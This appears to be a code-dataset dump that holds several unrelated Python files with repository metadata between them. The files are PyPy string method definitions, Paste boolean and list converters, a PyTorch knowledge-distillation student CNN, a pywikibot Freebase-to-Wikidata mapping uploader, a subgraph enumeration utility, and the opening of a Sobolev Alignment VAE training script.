doc='S.replace (old, new[, count]) -> string\n\nReturn a'
' copy of string S with all occurrences of'
' substring\nold replaced by new. If the optional'
' argument count is\ngiven, only the first count'
' occurrences are replaced.')
str_zfill = SMM('zfill', 2,
doc='S.zfill(width) -> string\n\nPad a numeric string S'
' with zeros on the left, to fill a field\nof the'
' specified width. The string S is never truncated.')
str_strip = SMM('strip', 2, defaults=(None,),
doc='S.strip([chars]) -> string or unicode\n\nReturn a'
' copy of the string S with leading and'
' trailing\nwhitespace removed.\nIf chars is given'
' and not None, remove characters in chars'
' instead.\nIf chars is unicode, S will be converted'
' to unicode before stripping')
str_rstrip = SMM('rstrip', 2, defaults=(None,),
doc='S.rstrip([chars]) -> string or unicode\n\nReturn a'
' copy of the string S with trailing whitespace'
' removed.\nIf chars is given and not None, remove'
' characters in chars instead.\nIf chars is unicode,'
' S will be converted to unicode before stripping')
str_lstrip = SMM('lstrip', 2, defaults=(None,),
doc='S.lstrip([chars]) -> string or unicode\n\nReturn a'
' copy of the string S with leading whitespace'
' removed.\nIf chars is given and not None, remove'
' characters in chars instead.\nIf chars is unicode,'
' S will be converted to unicode before stripping')
str_center = SMM('center', 3, defaults=(' ',),
doc='S.center(width[, fillchar]) -> string\n\nReturn S'
' centered in a string of length width. Padding'
' is\ndone using the specified fill character'
' (default is a space)')
str_count = SMM('count', 4, defaults=(0, maxint),
doc='S.count(sub[, start[, end]]) -> int\n\nReturn the'
' number of occurrences of substring sub in'
' string\nS[start:end]. Optional arguments start and'
' end are\ninterpreted as in slice notation.')
str_endswith = SMM('endswith', 4, defaults=(0, maxint),
doc='S.endswith(suffix[, start[, end]]) -> bool\n\nReturn'
' True if S ends with the specified suffix, False'
' otherwise.\nWith optional start, test S beginning'
' at that position.\nWith optional end, stop'
' comparing S at that position.')
str_expandtabs = SMM('expandtabs', 2, defaults=(8,),
doc='S.expandtabs([tabsize]) -> string\n\nReturn a copy'
' of S where all tab characters are expanded using'
' spaces.\nIf tabsize is not given, a tab size of 8'
' characters is assumed.')
str_splitlines = SMM('splitlines', 2, defaults=(0,),
doc='S.splitlines([keepends]) -> list of'
' strings\n\nReturn a list of the lines in S,'
' breaking at line boundaries.\nLine breaks are not'
' included in the resulting list unless keepends\nis'
' given and true.')
str_startswith = SMM('startswith', 4, defaults=(0, maxint),
doc='S.startswith(prefix[, start[, end]]) ->'
' bool\n\nReturn True if S starts with the specified'
' prefix, False otherwise.\nWith optional start, test'
' S beginning at that position.\nWith optional end,'
' stop comparing S at that position.')
str_translate = SMM('translate', 3, defaults=('',),
doc='S.translate(table [,deletechars]) -> string\n\n'
'Return a copy of the string S, where all characters'
' occurring\nin the optional argument deletechars are'
' removed, and the\nremaining characters have been'
' mapped through the given\ntranslation table, which'
' must be a string of length 256.')
str_decode = SMM('decode', 3, defaults=(None, None),
doc='S.decode([encoding[,errors]]) -> object\n\nDecodes S'
' using the codec registered for encoding. encoding'
' defaults\nto the default encoding. errors may be'
' given to set a different error\nhandling scheme.'
" Default is 'strict' meaning that encoding errors"
' raise\na UnicodeDecodeError. Other possible values'
" are 'ignore' and 'replace'\nas well as any other"
' name registerd with codecs.register_error that'
' is\nable to handle UnicodeDecodeErrors.')
str_encode = SMM('encode', 3, defaults=(None, None),
doc='S.encode([encoding[,errors]]) -> object\n\nEncodes S'
' using the codec registered for encoding. encoding'
' defaults\nto the default encoding. errors may be'
' given to set a different error\nhandling scheme.'
" Default is 'strict' meaning that encoding errors"
' raise\na UnicodeEncodeError. Other possible values'
" are 'ignore', 'replace' and\n'xmlcharrefreplace' as"
' well as any other name registered'
' with\ncodecs.register_error that is able to handle'
' UnicodeEncodeErrors.')
def descr__new__(space, w_stringtype, w_object=''):
from pypy.objspace.std.stringobject import W_StringObject
w_obj = space.str(w_object)
if space.is_w(w_stringtype, space.w_str):
return w_obj
value = space.str_w(w_obj)
if space.config.objspace.std.withrope:
from pypy.objspace.std.ropeobject import rope, W_RopeObject
w_obj = space.allocate_instance(W_RopeObject, w_stringtype)
W_RopeObject.__init__(w_obj, rope.LiteralStringNode(value))
return w_obj
else:
w_obj = space.allocate_instance(W_StringObject, w_stringtype)
W_StringObject.__init__(w_obj, value)
return w_obj
str_typedef = StdTypeDef("str", basestring_typedef,
__new__ = newmethod(descr__new__),
__doc__ = '''str(object) -> string
Return a nice string representation of the object.
If the argument is a string, the return value is the same object.'''
)
str_typedef.custom_hash = True
str_typedef.registermethods(globals())
@specialize.argtype(0)
def stringendswith(u_self, suffix, start, end):
begin = end - len(suffix)
if begin < start:
return False
for i in range(len(suffix)):
if u_self[begin+i] != suffix[i]:
return False
return True
@specialize.argtype(0)
def stringstartswith(u_self, prefix, start, end):
stop = start + len(prefix)
if stop > end:
return False
for i in range(len(prefix)):
if u_self[start+i] != prefix[i]:
return False
return True
| true
| true
|
790c789ef0591a9f2be37f1d51653b8952fa335a
| 844
|
py
|
Python
|
ita/web/beaker/converters.py
|
Tezar/Assigment-generator
|
2a3d0d10f1e3b215a79efc727e26d2ebbf1bb7a3
|
[
"Apache-2.0"
] | null | null | null |
ita/web/beaker/converters.py
|
Tezar/Assigment-generator
|
2a3d0d10f1e3b215a79efc727e26d2ebbf1bb7a3
|
[
"Apache-2.0"
] | null | null | null |
ita/web/beaker/converters.py
|
Tezar/Assigment-generator
|
2a3d0d10f1e3b215a79efc727e26d2ebbf1bb7a3
|
[
"Apache-2.0"
] | 1
|
2020-07-24T05:48:47.000Z
|
2020-07-24T05:48:47.000Z
|
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
def asbool(obj):
if isinstance(obj, str):
obj = obj.strip().lower()
if obj in ['true', 'yes', 'on', 'y', 't', '1']:
return True
elif obj in ['false', 'no', 'off', 'n', 'f', '0']:
return False
else:
raise ValueError(
"String is not true/false: %r" % obj)
return bool(obj)
def aslist(obj, sep=None, strip=True):
if isinstance(obj, str):
lst = obj.split(sep)
if strip:
lst = [v.strip() for v in lst]
return lst
elif isinstance(obj, (list, tuple)):
return obj
elif obj is None:
return []
else:
return [obj]
| 28.133333
| 84
| 0.5391
|
def asbool(obj):
if isinstance(obj, str):
obj = obj.strip().lower()
if obj in ['true', 'yes', 'on', 'y', 't', '1']:
return True
elif obj in ['false', 'no', 'off', 'n', 'f', '0']:
return False
else:
raise ValueError(
"String is not true/false: %r" % obj)
return bool(obj)
def aslist(obj, sep=None, strip=True):
if isinstance(obj, str):
lst = obj.split(sep)
if strip:
lst = [v.strip() for v in lst]
return lst
elif isinstance(obj, (list, tuple)):
return obj
elif obj is None:
return []
else:
return [obj]
| true
| true
|
790c7949e38fea35c440f0cd1ae210a7ab63f104
| 6,169
|
py
|
Python
|
model/studentB.py
|
eungbean/knowledge-distillation-cifar10
|
683379804c8724d097a845cee85f130b6767dbd7
|
[
"MIT"
] | 1
|
2021-02-27T15:13:32.000Z
|
2021-02-27T15:13:32.000Z
|
model/studentB.py
|
eungbean/knowledge-distillation-cifar10
|
683379804c8724d097a845cee85f130b6767dbd7
|
[
"MIT"
] | 9
|
2019-12-16T22:16:55.000Z
|
2021-09-08T01:23:09.000Z
|
model/studentB.py
|
eungbean/knowledge-distillation-cifar10
|
683379804c8724d097a845cee85f130b6767dbd7
|
[
"MIT"
] | null | null | null |
"""
Baseline CNN, losss function and metrics
Also customizes knowledge distillation (KD) loss function here
"""
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
class Flatten(nn.Module):
def forward(self, input):
return input.view(input.size(0), -1)
"""
This is the standard way to define your own network in PyTorch. You typically choose the components
(e.g. LSTMs, linear layers etc.) of your network in the __init__ function. You then apply these layers
on the input step-by-step in the forward function. You can use torch.nn.functional to apply functions
such as F.relu, F.sigmoid, F.softmax, F.max_pool2d. Be careful to ensure your dimensions are correct after each
step. You are encouraged to have a look at the network in pytorch/nlp/model/net.py to get a better sense of how
you can go about defining your own network.
The documentation for all the various components available o you is here: http://pytorch.org/docs/master/nn.html
"""
class studentB(nn.Module):
def __init__(self, params):
"""
We define an convolutional network that predicts the sign from an image. The components
required are:
Args:
params: (Params) contains num_channels
"""
super(studentB, self).__init__()
self.num_channels = params.num_channels
# each of the convolution layers below have the arguments (input_channels, output_channels, filter_size,
# stride, padding). We also include batch normalisation layers that help stabilise training.
# For more details on how to use these layers, check out the documentation.
self.conv1 = nn.Conv2d(3, 32, 5, stride=1, padding=2)
self.bn1 = nn.BatchNorm2d(32)
self.conv2_1 = nn.Conv2d(32, 32, 1, stride=1, padding=0)
self.conv2_2 = nn.Conv2d(32, 32, 3, stride=1, padding=1)
self.conv2_3 = nn.Conv2d(32, 64, 1, stride=1, padding=0)
self.bn2 = nn.BatchNorm2d(64)
self.conv3_1 = nn.Conv2d(64, 64, 1, stride=1, padding=0)
self.conv3_2 = nn.Conv2d(64, 64, 3, stride=1, padding=1)
self.conv3_3 = nn.Conv2d(64, 128, 1, stride=1, padding=0)
self.bn3 = nn.BatchNorm2d(128)
# 2 fully connected layers to transform the output of the convolution layers to the final output
self.fc1 = nn.Linear(4*4*128, 500)
self.fcbn1 = nn.BatchNorm1d(500)
self.fc2 = nn.Linear(500, 10)
self.dropout_rate = params.dropout_rate
def forward(self, s):
"""
This function defines how we use the components of our network to operate on an input batch.
Args:
s: (Variable) contains a batch of images, of dimension batch_size x 3 x 32 x 32 .
Returns:
out: (Variable) dimension batch_size x 6 with the log probabilities for the labels of each image.
Note: the dimensions after each step are provided
"""
# -> batch_size x 3 x 32 x 32
# we apply the convolution layers, followed by batch normalisation, maxpool and relu x 3
s = self.bn1(self.conv1(s)) # batch_size x 32 x 32 x 32
s = F.relu(F.max_pool2d(s, 2)) # batch_size x 32 x 16 x 16
s = self.conv2_1(s)
s = self.conv2_2(s)
s = self.conv2_3(s)
s = self.bn2(s) # batch_size x 10 * 2 x 16 x 16
s = F.relu(F.max_pool2d(s, 2)) # batch_size x num_channels*2 x 8 x 8
s = self.conv3_1(s)
s = self.conv3_2(s)
s = self.conv3_3(s)
s = self.bn3(s) # batch_size x 10 * 2 x 16 x 16
s = F.relu(F.max_pool2d(s, 2)) # batch_size x num_channels*2 x 8 x 8
# flatten the output for each image
s = s.view(-1, 4*4*128) # batch_size x 4*4*num_channels*4
# apply 2 fully connected layers with dropout
s = F.dropout(F.relu(self.fcbn1(self.fc1(s))),
p=self.dropout_rate, training=self.training) # batch_size x self.num_channels*4
s = self.fc2(s) # batch_size x 10
return s
def loss_fn(outputs, labels):
"""
Compute the cross entropy loss given outputs and labels.
Args:
outputs: (Variable) dimension batch_size x 6 - output of the model
labels: (Variable) dimension batch_size, where each element is a value in [0, 1, 2, 3, 4, 5]
Returns:
loss (Variable): cross entropy loss for all images in the batch
Note: you may use a standard loss function from http://pytorch.org/docs/master/nn.html#loss-functions. This example
demonstrates how you can easily define a custom loss function.
"""
return nn.CrossEntropyLoss()(outputs, labels)
def loss_fn_kd(outputs, labels, teacher_outputs, params):
"""
Compute the knowledge-distillation (KD) loss given outputs, labels.
"Hyperparameters": temperature and alpha
NOTE: the KL Divergence for PyTorch comparing the softmaxs of teacher
and student expects the input tensor to be log probabilities! See Issue #2
"""
alpha = params.alpha
T = params.temperature
KD_loss = nn.KLDivLoss()(F.log_softmax(outputs/T, dim=1),
F.softmax(teacher_outputs/T, dim=1)) * (alpha * T * T) + \
F.cross_entropy(outputs, labels) * (1. - alpha)
return KD_loss
def accuracy(outputs, labels):
"""
Compute the accuracy, given the outputs and labels for all images.
Args:
outputs: (np.ndarray) output of the model
labels: (np.ndarray) [0, 1, ..., num_classes-1]
Returns: (float) accuracy in [0,1]
"""
outputs = np.argmax(outputs, axis=1)
return np.sum(outputs==labels)/float(labels.size)
# maintain all metrics required in this dictionary- these are used in the training and evaluation loops
metrics = {
'accuracy': accuracy,
# could add more metrics such as accuracy for each token type
}
| 40.058442
| 119
| 0.625385
|
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
class Flatten(nn.Module):
def forward(self, input):
return input.view(input.size(0), -1)
class studentB(nn.Module):
def __init__(self, params):
super(studentB, self).__init__()
self.num_channels = params.num_channels
self.conv1 = nn.Conv2d(3, 32, 5, stride=1, padding=2)
self.bn1 = nn.BatchNorm2d(32)
self.conv2_1 = nn.Conv2d(32, 32, 1, stride=1, padding=0)
self.conv2_2 = nn.Conv2d(32, 32, 3, stride=1, padding=1)
self.conv2_3 = nn.Conv2d(32, 64, 1, stride=1, padding=0)
self.bn2 = nn.BatchNorm2d(64)
self.conv3_1 = nn.Conv2d(64, 64, 1, stride=1, padding=0)
self.conv3_2 = nn.Conv2d(64, 64, 3, stride=1, padding=1)
self.conv3_3 = nn.Conv2d(64, 128, 1, stride=1, padding=0)
self.bn3 = nn.BatchNorm2d(128)
self.fc1 = nn.Linear(4*4*128, 500)
self.fcbn1 = nn.BatchNorm1d(500)
self.fc2 = nn.Linear(500, 10)
self.dropout_rate = params.dropout_rate
def forward(self, s):
s = self.bn1(self.conv1(s))
s = F.relu(F.max_pool2d(s, 2))
s = self.conv2_1(s)
s = self.conv2_2(s)
s = self.conv2_3(s)
s = self.bn2(s)
s = F.relu(F.max_pool2d(s, 2))
s = self.conv3_1(s)
s = self.conv3_2(s)
s = self.conv3_3(s)
s = self.bn3(s)
s = F.relu(F.max_pool2d(s, 2))
s = s.view(-1, 4*4*128)
s = F.dropout(F.relu(self.fcbn1(self.fc1(s))),
p=self.dropout_rate, training=self.training)
s = self.fc2(s)
return s
def loss_fn(outputs, labels):
return nn.CrossEntropyLoss()(outputs, labels)
def loss_fn_kd(outputs, labels, teacher_outputs, params):
alpha = params.alpha
T = params.temperature
KD_loss = nn.KLDivLoss()(F.log_softmax(outputs/T, dim=1),
F.softmax(teacher_outputs/T, dim=1)) * (alpha * T * T) + \
F.cross_entropy(outputs, labels) * (1. - alpha)
return KD_loss
def accuracy(outputs, labels):
outputs = np.argmax(outputs, axis=1)
return np.sum(outputs==labels)/float(labels.size)
metrics = {
'accuracy': accuracy,
}
| true
| true
|
790c795137c30a0537925494d86f409b70e93998
| 4,148
|
py
|
Python
|
scripts/freebasemappingupload.py
|
notconfusing/pywikibot-fr-welcome-bot
|
6e07b7e74166a47c9425816e79786308df369ac2
|
[
"MIT"
] | 1
|
2020-01-03T11:52:01.000Z
|
2020-01-03T11:52:01.000Z
|
scripts/freebasemappingupload.py
|
notconfusing/pywikibot-fr-welcome-bot
|
6e07b7e74166a47c9425816e79786308df369ac2
|
[
"MIT"
] | 2
|
2019-11-07T13:46:32.000Z
|
2019-11-07T14:20:53.000Z
|
scripts/freebasemappingupload.py
|
notconfusing/pywikibot-fr-welcome-bot
|
6e07b7e74166a47c9425816e79786308df369ac2
|
[
"MIT"
] | 1
|
2020-04-14T14:52:24.000Z
|
2020-04-14T14:52:24.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Script to upload the mappings of Freebase to Wikidata.
Can be easily adapted to upload other String identifiers as well
This bot needs the dump from
https://developers.google.com/freebase/data#freebase-wikidata-mappings
The script takes a single parameter:
-filename: the filename to read the freebase-wikidata mappings from;
default: fb2w.nt.gz
"""
#
# (C) Denny Vrandecic, 2013
# (C) Pywikibot team, 2013-2018
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
import gzip
import os
import sys
import pywikibot
class FreebaseMapperRobot(object):
"""Freebase Mapping bot."""
def __init__(self, filename):
"""Initializer."""
self.repo = pywikibot.Site('wikidata', 'wikidata').data_repository()
self.filename = filename
if not os.path.exists(self.filename):
pywikibot.output('Cannot find %s. Try providing the absolute path.'
% self.filename)
sys.exit(1)
def run(self):
"""Run the bot."""
# Set up some items we will use a lot.
self.claim = pywikibot.Claim(self.repo, 'P646') # freebase mapping
# And sources!
self.statedin = pywikibot.Claim(self.repo, 'P248') # stated in
# Freebase data dump
freebasedumpitem = pywikibot.ItemPage(self.repo, 'Q15241312')
self.statedin.setTarget(freebasedumpitem)
# date of publication
self.dateofpub = pywikibot.Claim(self.repo, 'P577')
oct28 = pywikibot.WbTime(site=self.repo, year=2013, month=10, day=28,
precision='day')
self.dateofpub.setTarget(oct28)
for line in gzip.open(self.filename):
self.processLine(line.strip())
def processLine(self, line):
"""Process a single line."""
if not line or line.startswith('#'):
return
mid, sameas, qid, dot = line.split()
if sameas != '<https://www.w3.org/2002/07/owl#sameAs>':
return
if dot != '.':
return
if not mid.startswith('<https://rdf.freebase.com/ns/m'):
return
mid = '/m/' + mid[30:-1]
if not qid.startswith('<https://www.wikidata.org/entity/Q'):
return
qid = 'Q' + qid[33:-1]
data = pywikibot.ItemPage(self.repo, qid)
data.get()
if not data.labels:
label = ''
elif 'en' in data.labels:
label = data.labels['en']
else:
# Just pick up the first label
label = list(data.labels.values())[0]
pywikibot.output('Parsed: {} <--> {}'.format(qid, mid))
pywikibot.output('{} is {}'.format(data.getID(), label))
if data.claims and 'P646' in data.claims:
# We assume that there is only one claim.
# If there are multiple ones, our logs might be wrong
# but the constraint value reports will catch them
if mid != data.claims['P646'][0].getTarget():
pywikibot.output('Mismatch: expected {}, has {} instead'
.format(mid,
data.claims['P646'][0].getTarget()))
else:
pywikibot.output('Already has mid set, is consistent.')
else:
# No claim set, lets add it.
pywikibot.output('Going to add a new claim.')
self.claim.setTarget(mid)
data.addClaim(self.claim)
self.claim.addSources([self.statedin, self.dateofpub])
pywikibot.output('Claim added!')
def main(*args):
"""
Process command line arguments and invoke bot.
If args is an empty list, sys.argv is used.
@param args: command line arguments
@type args: str
"""
filename = 'fb2w.nt.gz' # Default filename
for arg in pywikibot.handle_args(args):
if arg.startswith('-filename'):
filename = arg[11:]
bot = FreebaseMapperRobot(filename)
bot.run()
if __name__ == '__main__':
main()
| 32.920635
| 79
| 0.583173
|
from __future__ import absolute_import, division, unicode_literals
import gzip
import os
import sys
import pywikibot
class FreebaseMapperRobot(object):
def __init__(self, filename):
self.repo = pywikibot.Site('wikidata', 'wikidata').data_repository()
self.filename = filename
if not os.path.exists(self.filename):
pywikibot.output('Cannot find %s. Try providing the absolute path.'
% self.filename)
sys.exit(1)
def run(self):
self.claim = pywikibot.Claim(self.repo, 'P646')
self.statedin = pywikibot.Claim(self.repo, 'P248')
freebasedumpitem = pywikibot.ItemPage(self.repo, 'Q15241312')
self.statedin.setTarget(freebasedumpitem)
self.dateofpub = pywikibot.Claim(self.repo, 'P577')
oct28 = pywikibot.WbTime(site=self.repo, year=2013, month=10, day=28,
precision='day')
self.dateofpub.setTarget(oct28)
for line in gzip.open(self.filename):
self.processLine(line.strip())
def processLine(self, line):
if not line or line.startswith('#'):
return
mid, sameas, qid, dot = line.split()
if sameas != '<https://www.w3.org/2002/07/owl#sameAs>':
return
if dot != '.':
return
if not mid.startswith('<https://rdf.freebase.com/ns/m'):
return
mid = '/m/' + mid[30:-1]
if not qid.startswith('<https://www.wikidata.org/entity/Q'):
return
qid = 'Q' + qid[33:-1]
data = pywikibot.ItemPage(self.repo, qid)
data.get()
if not data.labels:
label = ''
elif 'en' in data.labels:
label = data.labels['en']
else:
label = list(data.labels.values())[0]
pywikibot.output('Parsed: {} <--> {}'.format(qid, mid))
pywikibot.output('{} is {}'.format(data.getID(), label))
if data.claims and 'P646' in data.claims:
if mid != data.claims['P646'][0].getTarget():
pywikibot.output('Mismatch: expected {}, has {} instead'
.format(mid,
data.claims['P646'][0].getTarget()))
else:
pywikibot.output('Already has mid set, is consistent.')
else:
pywikibot.output('Going to add a new claim.')
self.claim.setTarget(mid)
data.addClaim(self.claim)
self.claim.addSources([self.statedin, self.dateofpub])
pywikibot.output('Claim added!')
def main(*args):
filename = 'fb2w.nt.gz'
for arg in pywikibot.handle_args(args):
if arg.startswith('-filename'):
filename = arg[11:]
bot = FreebaseMapperRobot(filename)
bot.run()
if __name__ == '__main__':
main()
| true
| true
|
790c7a0c2a88b22dd3182e9569eb81e432c95c8f
| 4,590
|
py
|
Python
|
hsst/utility/dfs_subgraph_enumeration.py
|
matichorvat/hsst
|
9804892aa8cf2a226a3e406451fa4ecdbc7338cc
|
[
"MIT"
] | null | null | null |
hsst/utility/dfs_subgraph_enumeration.py
|
matichorvat/hsst
|
9804892aa8cf2a226a3e406451fa4ecdbc7338cc
|
[
"MIT"
] | null | null | null |
hsst/utility/dfs_subgraph_enumeration.py
|
matichorvat/hsst
|
9804892aa8cf2a226a3e406451fa4ecdbc7338cc
|
[
"MIT"
] | null | null | null |
from collections import defaultdict
from hsst.utility import search
from hsst.utility.graph import SemanticGraph
class SubgraphEnumeration(object):
def __init__(self, graph, node_set_size_limit=0):
self.full_node_set = graph.nodes
self.full_edge_set = graph.edges
self.current_node_set = set()
self.current_edge_set = set()
self.visited_states = set()
self.subgraphs = []
self.node_set_size_limit = node_set_size_limit
# Create fast lookup structures
self.edges_by_source = defaultdict(set)
self.edges_by_destination = defaultdict(set)
self.edges_by_both = defaultdict(set)
self.labels = defaultdict(list)
for edge in self.full_edge_set:
self.labels[(edge.from_node, edge.to_node)].append(edge)
self.edges_by_source[edge.from_node].add(edge.to_node)
self.edges_by_destination[edge.to_node].add(edge.from_node)
self.edges_by_both[edge.from_node].add(edge.to_node)
self.edges_by_both[edge.to_node].add(edge.from_node)
def generate_moves(self):
# Generate all possible moves
# Each move consists of a single node and the set of edges that connect that node to the nodes
# in the currentNodeSet E.g. ( node, { (label1, node, node1), (label2, node2, node) ... } )
# Moves are temporarily stored as a dictionary so that the full set of edges associated with each move
# can be constructed
moves = []
temporary_moves = {}
# Check if the limit for the currentNodeSet size has been reached
if 0 < self.node_set_size_limit <= len(self.current_node_set):
return moves
# The initial step is handled separately
if not self.current_node_set:
for node in self.full_node_set:
moves.append((node, set()))
return moves
# The set of possible nodes consists of nodes that are not yet in the currentNodeSet
possible_nodes = self.full_node_set - self.current_node_set
# For every possible node, we need to check that it shares an edge with a node in the currentNodeSet
# Otherwise we would violate the 'connected' constraint
for possible_node in possible_nodes:
destination_nodes = self.edges_by_source[possible_node] & self.current_node_set
source_nodes = self.edges_by_destination[possible_node] & self.current_node_set
if len(destination_nodes) > 0 or len(source_nodes) > 0:
# There is at least one node in the current node set that we can connect the possible_node to
# Check if this state has been explored already
if self.id(node=possible_node) in self.visited_states:
continue
# If not, it is an acceptable move and we just need to construct the edge set that connects
# the possible_node to the current node set
edges = set(
edge for source_node in source_nodes for edge in self.labels[(source_node, possible_node)]) | \
set(edge for destination_node in destination_nodes for edge in
self.labels[(possible_node, destination_node)])
temporary_moves[possible_node] = edges
for move in temporary_moves:
moves.append((move, temporary_moves[move]))
return moves
def move(self, move):
# Move is a tuple (node, edge_set)
node, edge_set = move
self.current_node_set.add(node)
self.current_edge_set |= edge_set
self.visited_states.add(self.id())
self.subgraphs.append((self.current_node_set.copy(), self.current_edge_set.copy()))
def undo_move(self, move):
# Move is a tuple (node, edge_set)
node, edge_set = move
self.current_node_set.remove(node)
self.current_edge_set -= edge_set
def solved(self):
return False
def id(self, node=None):
if node:
return " ".join(str(x) for x in sorted(self.current_node_set | {node}, key=lambda x: x.node_id))
else:
return " ".join(str(x) for x in sorted(self.current_node_set, key=lambda x: x.node_id))
def enumerate_dfs_subgraphs(graph, df_limit=100):
enumeration = SubgraphEnumeration(graph, node_set_size_limit=df_limit)
search.df(enumeration, df_limit)
return set(SemanticGraph(nodes, edges, nonterminal_count=0) for nodes, edges in enumeration.subgraphs)
| 38.898305
| 115
| 0.652505
|
from collections import defaultdict
from hsst.utility import search
from hsst.utility.graph import SemanticGraph
class SubgraphEnumeration(object):
def __init__(self, graph, node_set_size_limit=0):
self.full_node_set = graph.nodes
self.full_edge_set = graph.edges
self.current_node_set = set()
self.current_edge_set = set()
self.visited_states = set()
self.subgraphs = []
self.node_set_size_limit = node_set_size_limit
self.edges_by_source = defaultdict(set)
self.edges_by_destination = defaultdict(set)
self.edges_by_both = defaultdict(set)
self.labels = defaultdict(list)
for edge in self.full_edge_set:
self.labels[(edge.from_node, edge.to_node)].append(edge)
self.edges_by_source[edge.from_node].add(edge.to_node)
self.edges_by_destination[edge.to_node].add(edge.from_node)
self.edges_by_both[edge.from_node].add(edge.to_node)
self.edges_by_both[edge.to_node].add(edge.from_node)
def generate_moves(self):
moves = []
temporary_moves = {}
if 0 < self.node_set_size_limit <= len(self.current_node_set):
return moves
if not self.current_node_set:
for node in self.full_node_set:
moves.append((node, set()))
return moves
possible_nodes = self.full_node_set - self.current_node_set
for possible_node in possible_nodes:
destination_nodes = self.edges_by_source[possible_node] & self.current_node_set
source_nodes = self.edges_by_destination[possible_node] & self.current_node_set
if len(destination_nodes) > 0 or len(source_nodes) > 0:
if self.id(node=possible_node) in self.visited_states:
continue
edges = set(
edge for source_node in source_nodes for edge in self.labels[(source_node, possible_node)]) | \
set(edge for destination_node in destination_nodes for edge in
self.labels[(possible_node, destination_node)])
temporary_moves[possible_node] = edges
for move in temporary_moves:
moves.append((move, temporary_moves[move]))
return moves
def move(self, move):
node, edge_set = move
self.current_node_set.add(node)
self.current_edge_set |= edge_set
self.visited_states.add(self.id())
self.subgraphs.append((self.current_node_set.copy(), self.current_edge_set.copy()))
def undo_move(self, move):
node, edge_set = move
self.current_node_set.remove(node)
self.current_edge_set -= edge_set
def solved(self):
return False
def id(self, node=None):
if node:
return " ".join(str(x) for x in sorted(self.current_node_set | {node}, key=lambda x: x.node_id))
else:
return " ".join(str(x) for x in sorted(self.current_node_set, key=lambda x: x.node_id))
def enumerate_dfs_subgraphs(graph, df_limit=100):
enumeration = SubgraphEnumeration(graph, node_set_size_limit=df_limit)
search.df(enumeration, df_limit)
return set(SemanticGraph(nodes, edges, nonterminal_count=0) for nodes, edges in enumeration.subgraphs)
| true
| true
|
790c7a1b4c501fb03fc116411c54360745164692
| 2,803
|
py
|
Python
|
figure_3/model_III/sobolev_alignment/train_VAE.py
|
saroudant/sobolev_alignment_manuscript
|
2b4d7ce4bbdac3a32ad8c02b950b4d1c91cda193
|
[
"MIT"
] | null | null | null |
figure_3/model_III/sobolev_alignment/train_VAE.py
|
saroudant/sobolev_alignment_manuscript
|
2b4d7ce4bbdac3a32ad8c02b950b4d1c91cda193
|
[
"MIT"
] | null | null | null |
figure_3/model_III/sobolev_alignment/train_VAE.py
|
saroudant/sobolev_alignment_manuscript
|
2b4d7ce4bbdac3a32ad8c02b950b4d1c91cda193
|
[
"MIT"
] | null | null | null |
"""
This script:
- Train Sobolev Alignment.
- Save the two networks.
"""
import os, sys, getopt
import pandas as pd
import numpy as np
import re
from anndata import AnnData
import torch
from pickle import dump, load
from copy import deepcopy
import gc
from sobolev_alignment import SobolevAlignment
# Import params
from model_III_synthetic_params import *
from read_data import read_data
# Import parameters
n_artificial_samples = None
tmp_file = None
opts, args = getopt.getopt(sys.argv[1:],'o:d:n:t:j:p:',['output=', 'data=', 'artifsamples=', 'temp=', 'job=', 'perm='])
for opt, arg in opts:
if opt in ("-o", "--output"):
output_folder = str(arg)
elif opt in ("-d", "--data"):
data_subfolder = str(arg)
elif opt in ('-n', '--artifsamples'):
n_artificial_samples = int(arg)
elif opt in ('-t', '--temp'):
tmp_file = str(arg)
elif opt in ('-j', '--job'):
n_jobs = int(arg)
n_artificial_samples = n_artificial_samples if n_artificial_samples is not None else 10**6
n_artificial_samples = int(n_artificial_samples)
tmp_file = tmp_file if tmp_file is not None else '/tmp/SM/'
###
# IMPORT DATA
###
X_source, X_target = read_data(data_folder, data_subfolder)
gc.collect()
###
# Sobolev Alignment start
###
# Read best parameters
cell_line_scvi_params, tumor_scvi_params = read_scvi_params(output_folder)
sobolev_alignment_clf = SobolevAlignment(
source_scvi_params=cell_line_scvi_params,
target_scvi_params=tumor_scvi_params,
source_krr_params=default_krr_params,
target_krr_params=default_krr_params,
n_jobs=n_jobs
)
###
# Training Sobolev Alignment if not already saved.
###
if 'sobolev_alignment_model' not in os.listdir(output_folder):
pass
else:
sys.exit("VAE ALREADY TRAINED")
sobolev_alignment_clf.n_jobs = n_jobs
sobolev_alignment_clf.fit(
X_source=X_source,
X_target=X_target,
source_batch_name=batch_name,
target_batch_name=batch_name,
continuous_covariate_names=continuous_covariate_names,
n_artificial_samples=100,
fit_vae=True,
sample_artificial=False,
krr_approx=False,
n_samples_per_sample_batch=10**6,
frac_save_artificial=1.,
save_mmap=tmp_file,
log_input=log_input,
no_posterior_collapse=no_posterior_collapse,
frob_norm_source=frob_norm_source
)
if 'sobolev_alignment_model' not in os.listdir(output_folder):
sobolev_alignment_clf.save('%s/sobolev_alignment_model/'%(output_folder), with_krr=False)
gc.collect()
# Save embedding
for x in sobolev_alignment_clf.scvi_models:
np.savetxt(
'%s/scvi_embedding_%s.csv'%(output_folder, x),
sobolev_alignment_clf.scvi_models[x].get_latent_representation()
)
torch.cuda.empty_cache()
gc.collect()
sys.exit("FINISH VAE TRAINING")
| 26.443396
| 119
| 0.727435
|
import os, sys, getopt
import pandas as pd
import numpy as np
import re
from anndata import AnnData
import torch
from pickle import dump, load
from copy import deepcopy
import gc
from sobolev_alignment import SobolevAlignment
from model_III_synthetic_params import *
from read_data import read_data
n_artificial_samples = None
tmp_file = None
opts, args = getopt.getopt(sys.argv[1:],'o:d:n:t:j:p:',['output=', 'data=', 'artifsamples=', 'temp=', 'job=', 'perm='])
for opt, arg in opts:
if opt in ("-o", "--output"):
output_folder = str(arg)
elif opt in ("-d", "--data"):
data_subfolder = str(arg)
elif opt in ('-n', '--artifsamples'):
n_artificial_samples = int(arg)
elif opt in ('-t', '--temp'):
tmp_file = str(arg)
elif opt in ('-j', '--job'):
n_jobs = int(arg)
n_artificial_samples = n_artificial_samples if n_artificial_samples is not None else 10**6
n_artificial_samples = int(n_artificial_samples)
tmp_file = tmp_file if tmp_file is not None else '/tmp/SM/'
